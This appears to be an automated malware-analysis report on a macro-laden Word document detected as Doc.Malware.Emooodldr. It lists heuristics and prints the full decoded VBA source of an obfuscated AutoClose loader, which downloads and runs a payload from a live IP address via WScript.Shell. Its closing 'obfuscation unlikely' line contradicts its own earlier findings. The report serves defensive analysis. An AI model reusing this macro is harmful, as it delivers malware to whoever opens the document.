MALICIOUS
322
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains heavily obfuscated VBA macros, including an Auto_Close macro, which is a common loader technique. The script attempts to download and execute a payload from the reconstructed URL 'http://198.55.107.156/o/a.php?uk=a.php' using WScript.Shell. ClamAV detection further confirms its malicious nature, identifying it as Doc.Malware.Emooodldr.
Heuristics 7
-
ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2543 bytes |
SHA-256: f290efbc56b555a7db591e411cf4821f61765270077273e4ad923c88ed220189 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub fominha()
BvizgwnFJEVL = 1025 - 1590 - 1635 - 526 - 1819 - 756 - 1765
yRpJONvq = Trim("p") & Trim("I") & "k"
WVLgBwJxEDk = 370 + 238 + 70
fkWiuqnMVjSz = 1215 + 673 + 137 + 1819 + 1867
oiVKZIzPndn = "N" & Trim("S") & "R"
cogumelo = "MwYvLMGnrDcdQPiIViiTwjEOhkruKnSxHEFyVVnAHriGfXVrQ hkruKnSxHEFyVkruKnSxHEFyVp://198.55.107.156/oMwYvLMGnrDcdMwYvLMGnrDcd/QPiIViiTwjEOkruKnSxHEFyVCBGKocwOuACWMwYvLMGnrDcd.php?ukruKnSxHEFyVMwYvLMGnrDcdVnAHriGfXVrQ=hondVnAHriGfXVrQ"
cogumelo = Replace(cogumelo, "MwYvLMGnrDcd", "m")
cogumelo = Replace(cogumelo, "VnAHriGfXVrQ", "a")
uPrnHBVNN = 1146 + 1067
cogumelo = Replace(cogumelo, "QPiIViiTwjEO", "s")
GfXuZGUWW = "w" & Trim("A")
pEfYMkCVMDBK = 1029 + 1651 + 643 + 1997 + 894 + 1199 + 969
cogumelo = Replace(cogumelo, "kruKnSxHEFyV", "t")
cogumelo = Replace(cogumelo, "CBGKocwOuACW", "e")
UHYdwIq = "d" & Trim("K") & Trim("Y")
iBAnroMgq = "Z" & "Q" & Trim("M")
cogumelo = Replace(cogumelo, "KySNYTJRAjKR", "l")
nirvana = "WScripLWrCpPbBzLwQ.ShXxIJQcGcbPYJRFyVPXiMOxOoRFyVPXiMOxOo"
nirvana = Replace(nirvana, "iJbwOEbXXDUY", "m")
nirvana = Replace(nirvana, "DuQkRQgnNogf", "a")
GFdjonOvvN = 1229 + 1997 + 767 + 1345
wdkWwVMogMdF = Trim("C") & Trim("o") & Trim("d")
WDuCSTJ = 519 - 1951 - 448 - 315 - 1544 - 1316 - 1496
nirvana = Replace(nirvana, "VfnwvorYrOGq", "s")
nirvana = Replace(nirvana, "LWrCpPbBzLwQ", "t")
nirvana = Replace(nirvana, "XxIJQcGcbPYJ", "e")
XooBBDiuw = "f" & "H" & Trim("D") & "A"
nirvana = Replace(nirvana, "RFyVPXiMOxOo", "l")
yBjcuoUUR = "i" & "c" & "q" & "M" & "i"
YFnIKVUDWo = 1743 + 996 + 1927 + 622 + 106 + 1839
CreateObject(nirvana).Run cogumelo, 0
YWBYKNnG = 1482 + 1928
iScvAfJ = "S" & "M" & "V"
iJWIpyRIvEo = 1085 + 821 + 1310 + 357
poSXLkHfzF = 1956 - 1587 - 1002 - 1256
UivKyIW = 1591 + 174 + 366 + 940 + 1106
End Sub
Sub AutoClose()
Xwzcvbkqgd = 1905 + 604 + 1197 + 113 + 469 + 1571 + 409
UArEdXocXAp = 1210 - 359
gRINSrwkzQH = Trim("R") & "T" & Trim("N") & Trim("i")
ZQQNViIRP = 1605 - 387 - 894 - 88
YiYrBorUWXo = 40 - 1342 - 1003 - 1795 - 930
Application.Run "fominha"
gAJMQHJn = 1568 + 1554 + 1690 + 1220
DQXDnWzd = 521 + 394 + 1937
PJqGHnKyW = "W" & "Z"
GxCxAKVQO = Trim("A") & Trim("Y")
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 12800 bytes |
SHA-256: a15c453d2e422cd837a18ea051e457b3cd58e6808d0dcfebc78def3ae71c547d |
|||
|
Detection
ClamAV:
Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.